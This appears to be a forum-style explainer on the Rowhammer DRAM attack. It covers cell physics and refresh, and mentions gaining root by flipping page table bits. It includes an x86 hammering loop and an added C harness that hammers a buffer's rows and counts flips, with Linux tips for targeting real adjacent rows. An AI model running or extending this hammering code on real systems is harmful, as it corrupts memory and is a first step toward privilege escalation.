Hi, I'm just reading up on Rowhammer, and I just want to put everything I already know down here.
Rowhammer is an attack method that creates bit flips by reading (activating) specific memory addresses in DRAM hundreds of thousands to millions of times in a row, faster than the memory is refreshed.
This attack method is relatively new; it has existed for about 5 years. It is a software-triggered hardware fault: the attack is carried out with nothing but ordinary memory reads, so no physical access is needed, but its effect is physical, in the DRAM cells themselves. Because of the rapid, repeated reading of the same row, the values stored at neighbouring memory addresses can change, i.e. bit flips occur.
The attack has been demonstrated on ordinary DRAM (DDR3 and DDR4), and more recently also on ECC memory, where the single-bit error correction only makes the attack slower: it can still be defeated by inducing several flips in the same word. A RAM module (DIMM) is a circuit board carrying several DRAM chips. Inside each chip the cells are organised in banks, and each bank is a grid of rows and columns; an address selects a bank, a row and a column within that row. A small sketch shows roughly how a memory chip looks.
In detail, a single row looks like this: there are two kinds of lines, wordlines and bitlines. A wordline runs along a row and selects all cells of that row at once; the bitlines run along the columns and carry the data in and out. Both are used to access the individual memory cells for reading and writing.
A memory cell is constructed as follows: one access transistor (a FET, field effect transistor) and one capacitor. The capacitor stores the charge, i.e. a zero (about 0 V) or a one (the supply voltage, 1.2 V for DDR4 and 1.5 V for DDR3).
The gate of the transistor (a FET has a gate, not a base) is connected to the wordline. As soon as the wordline is driven high, the transistor conducts and connects the capacitor to the bitline. The bitline can then either discharge the capacitor or charge it (a write), or a sense amplifier on the bitline detects the small charge flowing out of the capacitor (a read). Reading drains the cell, so every activation of a row ends with the row being written back.
The other terminal of the capacitor is connected to a fixed reference (ground, in this simplified picture). Because the capacitor leaks, its charge must be refreshed again and again, typically every 64 ms, otherwise the stored value is lost after a short time.
Activating the same row very frequently, many times within a single refresh interval, electrically disturbs the cells in the physically adjacent rows: the repeated toggling of the wordline makes the neighbouring capacitors leak charge faster than the refresh can restore it, so individual bits flip. The consequences of such bit flips are faulty behaviour of the computer: program errors, program crashes, or even a crash of the operating system. If the attacker can steer which memory is affected, the flips can be exploited to bypass security mechanisms, e.g. by flipping bits in a page table entry to gain root (kernel) privileges.
section .text
global _start
_start:
    mov ecx, 0xfffdd000     ; address X (placeholder value, must be mapped)
    mov edx, 0xfffdd002     ; address Y (placeholder value, must be mapped)
_hammer:
    mov eax, [ecx]          ; read X: activates its DRAM row
    mov ebx, [edx]          ; read Y: activates its DRAM row
    clflush [ecx]           ; evict X from the cache so the next read goes to DRAM again
    clflush [edx]           ; evict Y from the cache
    mfence                  ; wait for the flushes before the next loads
    jmp short _hammer       ; repeat, millions of times
The assembly code above is an example of the hammering loop of a Rowhammer attack. I have simply taken two addresses which are connected to the memory row 0xfffdd001 that is to be manipulated. These are meant to drive memory row 0xfffdd001 into bit flips. Here I should mention that it is best to look for memory addresses which are more effective or vulnerable. The ones I have taken here do not have large effects, in order to avoid crashes.
The attack then looks as in the assembly code: the addresses (red) are accessed at a high frequency until individual bit errors occur in the neighbouring addresses (gray).
This attack works not only on ordinary desktop computers but also on notebooks, tablets and smartphones, including ARM-based Android devices.
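As an added example (my own code, not part of the original post), here is the same hammering loop written as a user-space C program that also does the part the assembly leaves out: it fills a buffer it owns with a known pattern, hammers the two rows on either side of a victim row (double-sided hammering, so the victim itself is never read), and then scans the victim row for flipped bits. ROW_BYTES, the number of rounds, and the idea that row i-1 and row i+1 of this buffer are the DRAM rows next to row i are assumptions: that last one only holds if the buffer is physically contiguous (e.g. a huge page) and the DRAM address mapping of the machine is known. Note also that two addresses a few bytes apart share one cache line and one row; aggressors must lie in different rows of the same bank.

```c
/*
 * Added example (not from the original post): a user-space Rowhammer test
 * harness. Assumptions, not from the post: ROW_BYTES, the round count, and
 * that neighbouring rows of this buffer are neighbouring DRAM rows. With a
 * plain malloc buffer the loop runs, but you should not expect flips.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ROW_BYTES ((size_t)8 * 1024)   /* assumption: one DRAM row = 8 KiB of buffer */

/* Evict one cache line so the next load of that address goes to DRAM again
   (x86: clflush as in the assembly above; aarch64: dc civac; elsewhere no
   user-level flush instruction is available and the loop only hits the cache). */
static inline void flush_line(const volatile void *p) {
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#elif defined(__aarch64__)
    __asm__ volatile("dc civac, %0" : : "r"(p) : "memory");
#else
    (void)p;
#endif
}

/* Wait for the flushes to complete before the next loads (mfence). */
static inline void mem_fence(void) {
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("mfence" : : : "memory");
#elif defined(__aarch64__)
    __asm__ volatile("dsb ish" : : : "memory");
#else
    __sync_synchronize();
#endif
}

/* The hammer loop: read X and Y, flush both, repeat. volatile forces the
   compiler to really emit the loads instead of hoisting them out of the loop. */
static void hammer(volatile uint8_t *x, volatile uint8_t *y, unsigned rounds) {
    for (unsigned i = 0; i < rounds; i++) {
        (void)*x;        /* mov eax, [X] */
        (void)*y;        /* mov ebx, [Y] */
        flush_line(x);   /* clflush [X]  */
        flush_line(y);   /* clflush [Y]  */
        mem_fence();     /* mfence       */
    }
}

/* Compare a victim row with the pattern it was filled with; report each
   changed byte and return the total number of flipped bits. */
unsigned count_flips(const uint8_t *victim, size_t len, uint8_t pattern) {
    unsigned flips = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = victim[i] ^ pattern;
        if (diff) {
            printf("bit flip at offset %zu: 0x%02x -> 0x%02x\n", i, pattern, victim[i]);
            flips += (unsigned)__builtin_popcount(diff);
        }
    }
    return flips;
}

/* Double-sided hammering: the aggressors are the rows directly above and
   below the victim row; the victim row itself is never touched. */
static unsigned hammer_victim(uint8_t *buf, size_t victim_row, uint8_t pattern, unsigned rounds) {
    volatile uint8_t *above = buf + (victim_row - 1) * ROW_BYTES;
    volatile uint8_t *below = buf + (victim_row + 1) * ROW_BYTES;
    hammer(above, below, rounds);
    return count_flips(buf + victim_row * ROW_BYTES, ROW_BYTES, pattern);
}

/* Fill `rows` rows with all ones (so 1 -> 0 flips are visible), hammer every
   row that has a neighbour on both sides, and return the total flip count. */
unsigned run_demo(size_t rows, unsigned rounds) {
    const uint8_t pattern = 0xFF;
    uint8_t *buf = malloc(rows * ROW_BYTES);
    if (!buf) { perror("malloc"); exit(1); }
    memset(buf, pattern, rows * ROW_BYTES);
    unsigned total = 0;
    for (size_t victim = 1; victim + 1 < rows; victim++)
        total += hammer_victim(buf, victim, pattern, rounds);
    free(buf);
    return total;
}

int main(void) {
    unsigned flips = run_demo(64, 500000);   /* 62 victim rows x 500k rounds */
    printf("%u flipped bit(s) found\n", flips);
    return flips ? 1 : 0;
}
```

To turn this into a real test on Linux you would back the buffer with a huge page (or translate virtual to physical addresses via /proc/self/pagemap) so that consecutive rows of the buffer really are consecutive DRAM rows, and pick aggressor pairs that the DRAM controller maps to the same bank; the hammering and checking logic stays the same. Filling with 0xFF and then with 0x00 in a second pass catches flips in both directions.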